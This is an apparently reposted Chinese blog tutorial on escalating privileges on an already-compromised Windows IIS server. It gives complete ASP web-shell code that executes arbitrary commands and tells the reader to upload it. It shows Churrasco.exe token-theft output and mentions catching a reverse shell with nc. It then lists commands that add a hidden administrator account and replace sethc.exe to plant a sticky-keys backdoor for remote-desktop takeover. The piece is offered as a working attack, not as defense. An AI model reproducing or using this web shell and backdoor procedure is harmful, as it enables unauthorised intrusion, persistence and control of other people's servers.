1. 全栈程序员必看首页

启用shift后门的方法_服务器可以拿来干什么

全栈程序员-站长 未分类 阅读 5

启用shift后门的方法_服务器可以拿来干什么提权工具如下:cmd.exeChurrasco.exenc.exe提权前提:Wscript组件成功开启如果Wscript组件被关闭,则使用以下方法开启:源代码:<objectrunat=serverid=oScriptlhnscope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>  

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>

<%

end if %>

<form method=”post”>

<input type=text name=”cmdx” size=60 value=”C:\RECYCLER\cmd.exe”><br>

<input type=text name=”cmd” size=60><br>

<input type=submit value=”net user”></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request(“cmdx”)=”C:\RECYCLER\cmd.exe” then

response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall

end if

response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/–>Current User: NETWORK SERVICE

/churrasco/–>Getting Rpcss PID …

/churrasco/–>Found Rpcss PID: 696

/churrasco/–>Searching for Rpcss threads …

/churrasco/–>Found Thread: 444

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 700

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 704

/churrasco/–>Thread not impersonating, looking for another thread…

/churrasco/–>Found Thread: 712

/churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/–>Getting SYSTEM token from Rpcss Service…

/churrasco/–>Found szywjs Token

/churrasco/–>Found SYSTEM token 0xf1c

/churrasco/–>Running command with SYSTEM Token…

 

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

 

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe “net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe “net localgroup administrators iisuser /add”
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe “copy d:\windows\explorer.exe d:\windows\system32\sethc.exe”
  C:\RECYCLER\Churrasco.exe “copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe “
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192217.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2026年1月16日 下午10:43
下一篇 2026年1月16日 下午11:22


相关推荐

  • 字节跳动 java面经_字节跳动Java面经(已offer)[通俗易懂]

    字节跳动 java面经_字节跳动Java面经(已offer)[通俗易懂]

    5.15一面(3点开始,80分钟)1.自我介绍,聊了聊学校近况2.Java集合框架,看了哪些源码,arraylist、linkedlist原理,让你实现一个hashmap机会如何设计(没让手写????)3.线程池的执行过程、核心参数以及常用的几个线程池(感觉每次面试都会问????)4.JVM的相关知识,OOM如何定位,说几个虚拟机指令以及虚拟机栈可能会发生什么错误,四种引用类型5.Java并发,…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月16日
    46
  • Python Selenium库的使用「建议收藏」

    Python Selenium库的使用「建议收藏」

    (一)Selenium基础入门教程:Selenium官网教程1.Selenium简介Selenium是一个用于测试网站的自动化测试工具,支持各种浏览器包括Chrome、Firefox、Safari等主流界面浏览器,同时也支持phantomJS无界面浏览器。2.支持多种操作系统如Windows、Linux、IOS、Android等。3.安装Selenium…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月14日
    38
  • Redis命令之hscan

    Redis命令之hscan

    Redis命令之hscan1 业务背景在互联网的项目中为了提高性能和吞吐量 通常需要做一些优化和数据异构 比如查询 DB 我们可以优化索引 通过命中索引来提高查询速度 也可以把数据异构到 Redis 虽然 Redis 的性能非常好也支持 5 种数据结构 如果想性能更好的话 可以考虑异构到 JVM 缓存 也就是 DB 的数据异构到 Redis Redis 的数据定期异构到 JVM 缓存 2 带来问题在 Redis 中通过用一个 hashmap 来存储业务数据 当这些业务数据比较小 我们可以通过 hGetAll 来获取 redis 的整个 map 然后设

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月17日
    2
  • python安装类库方法

    python安装类库方法

    python安装类库方法一 通过 pip 安装 1 通过网络自动下载类库 pip 安装是比较常见的类库安装方法 常用的命令为 pipinstall 类库名 例如安装 scrapy 类库 执行命令 pipinstallsc 在执行上述命令时 会遇到 https pypi python org simple 无法打开的问题 此时只需指定源即可 pipinstallsc ihttps pypi

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    2
  • RTCM格式解析

    RTCM格式解析

    RTCM格式解析RTCM 为应对 GNSS 实时数据服务 RadioTechnic 提出了一种通用的 GNSS 数据编码格式用于网络通讯 与后处理常用的 RINRX 文件格式类似 RTCM 可以说是实时 GNSS 服务中的 RINEX 文件 在实时 PPP RTK 定位计算中几乎都会使用 在实际使用时 RTCM 以二进制序列的数组播发 其播发数据的格式如下图所示 如上表所示 RTCM 播发包括序言 保留字 信息占用字节个数 信息 和 CRC CyclicRedund

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    1
  • javaweb项目集成editor.md编辑器—markdown编辑器

    javaweb项目集成editor.md编辑器—markdown编辑器

    javaweb项目集成editor.md编辑器—markdown编辑器最近写一个博客系统,需要集成编辑器,所以我就打算集成一个markdown编辑器用来编辑文章。在网上搜,好像editor.md这个国产开源的markdown编辑器比较好。不过想吐槽是网上的教程真的。。。哈哈哈,开始我们的教程:1.首先在editor.md官网(http://pandao.github.io/editor.md/)下载这一个编辑器。这是下载好后的文件目录2.将目录下的css目

    全栈程序员-站长的头像 全栈程序员-站长
    2025年12月10日
    6

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号